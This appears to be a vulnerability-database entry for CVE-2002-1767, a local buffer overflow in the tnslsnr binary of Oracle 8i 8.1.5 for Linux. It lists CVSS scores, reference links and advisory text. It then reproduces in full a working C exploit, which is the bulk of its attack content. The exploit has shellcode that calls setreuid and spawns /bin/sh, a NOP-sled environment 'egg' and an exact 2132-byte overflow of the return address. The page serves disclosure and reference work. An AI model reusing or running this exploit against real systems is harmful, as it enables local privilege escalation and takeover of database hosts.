CVE-2002-1767
CVSS7.2
Published: 2002-12-31 00:00:00
Revised: 2008-09-05 16:31:27
NMCOE

[Original] Buffer overflow in tnslsnr of Oracle 8i Database Server 8.1.5 for Linux allows local users to execute arbitrary code as the oracle user via a long command line argument.


[CNNVD] Oracle 8i TNS Listener Local Command Argument Buffer Overflow Vulnerability (CNNVD-200212-086)

A buffer overflow vulnerability exists in tnslsnr of Oracle 8i Database Server 8.1.5 for Linux. A local user, acting as the database user, can execute arbitrary code by means of an over-long command line argument.

- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1767
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1767
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-086
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/8772
(UNKNOWN)  XF  oracle-tnslsnr-command-line-bo(8772)
http://www.securityfocus.com/bid/4413
(UNKNOWN)  BID  4413

- Vulnerability information

Oracle 8i TNS Listener Local Command Argument Buffer Overflow Vulnerability
High risk  Buffer overflow
2002-12-31 00:00:00 2005-10-20 00:00:00
Local
A buffer overflow vulnerability exists in tnslsnr of Oracle 8i Database Server 8.1.5 for Linux. A local user, acting as the database user, can execute arbitrary code by means of an over-long command line argument.

- Advisories and patches

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (21362)

Oracle 8i TNS Listener Local Command Parameter Buffer Overflow Vulnerability (EDBID:21362)
linux local
2002-04-01 Verified
0 the itch
N/A
source: http://www.securityfocus.com/bid/4413/info

Oracle 8i is a powerful relational database product. It is available for Windows, Linux, and a wide range of Unix operating systems.

A vulnerability has been reported with some versions of Oracle 8i for Linux. A local attacker able to execute the tnslsnr process may pass an oversized command line parameter and cause a buffer overflow, possibly leading to the execution of arbitrary code as the user 'oracle'.

Versions of Oracle 8i available for other operating systems have not yet been confirmed as vulnerable. 

/*
 * Yet another exploit for the 'Unbreakable' Oracle database
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Shellcode created by r0z / Promisc
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 * mail dotslash@snosoft.com if you wish to participate in vuln research. 
 *
 * - The Itch
 * - itchie@promisc.org
 *
 * - Technical details concerning the exploit -
 *
 * 1). Buffer overflow occurs after writing more than 2132 bytes into the
 *     buffer at the command line (2128 to overwrite ebp, 2132 to
 *     overwrite eip).
 * 2). If you write more than 2132 bytes, other frames will be
 *     overwritten afterwards and will mess up your flow of arbitrary code
 *     execution. (It must be exactly 2132 bytes!)
 * 3). shellcode will try to do a setreuid(515);
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen, memcpy */
#include <unistd.h>     /* execl */

#define DEFAULT_EGG_SIZE 4096
#define NOP 0x90

/* 2132 + 1 for the \0 at the end of the string */
#define DEFAULT_BUFFER_SIZE 2133


/* Shellcode made by r0z (r0z@promisc.org) */
char shellcode[] =
         "\x31\xdb"              /* xor   %ebx, %ebx     */
         "\x31\xc9"              /* xor   %ecx, %ecx     */
         "\xf7\xe3"              /* mul   %ebx           */
         "\xb0\x46"              /* mov   $0x46, %al     */
         "\x66\xbb\x03\x02"      /* mov   $0x1fc, %bx    */
         "\x49"                  /* dec   %ecx           */
         "\xcd\x80"              /* int   $0x80          */
         "\x31\xd2"              /* xor   %edx, %edx     */
         "\x52"                  /* push  %edx           */
         "\x68\x6e\x2f\x73\x68"  /* push  $0x68732f6e    */
         "\x68\x2f\x2f\x62\x69"  /* push  $0x69622f2f    */
         "\x89\xe3"              /* mov   %esp, %ebx     */
         "\x52"                  /* push  %edx           */
         "\x53"                  /* push  %ebx           */
         "\x89\xe1"              /* mov   %esp, %ecx     */
         "\x6a\x0b"              /* pushl $0xb           */
         "\x58"                  /* pop   %eax           */
         "\xcd\x80";             /* int   $0x80          */

int main(int argc, char *argv[])
{
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        long addr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
        int get_sp = (int)&get_sp;

        if(argc > 1) { bsize = atoi(argv[1]); }

        if(!(buff = malloc(bsize)))
        {
                printf("unable to allocate memory for %d bytes\n", bsize);
                exit(1);
        }

        if(!(egg = malloc(eggsize)))
        {
                printf("unable to allocate memory for %d bytes\n", eggsize);
                exit(1);
        }

        printf("Oracle tnslsnr 8.1.5\n");
        printf("Vulnerability found by KF / http://www.snosoft.com\n");
        printf("Coded by The Itch / http://www.promisc.org\n\n");
        printf("Using return address: 0x%x\n", get_sp);
        printf("Using buffersize    : %d\n", bsize - 1);

        ptr = buff;
        addr_ptr = (long *) ptr;
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode)-1; i++)
        {
                *(ptr++) = NOP;
        }

        for(i = 0; i < strlen(shellcode); i++)
        {
                *(ptr++) = shellcode[i];
        }

        egg[eggsize - 1] = '\0';
        memcpy(egg, "EGG=", 4);
        putenv(egg);
        buff[bsize - 1 ]= '\0';
        execl("/home/u01/app/oracle/product/8.1.5/bin/tnslsnr",
              "tnslsnr", buff, (char *)NULL);
        return 0;
}


- Vulnerability information

59753
Oracle Database tnslsnr Command Line Argument Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2002-04-01 Unknown
2002-04-01 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.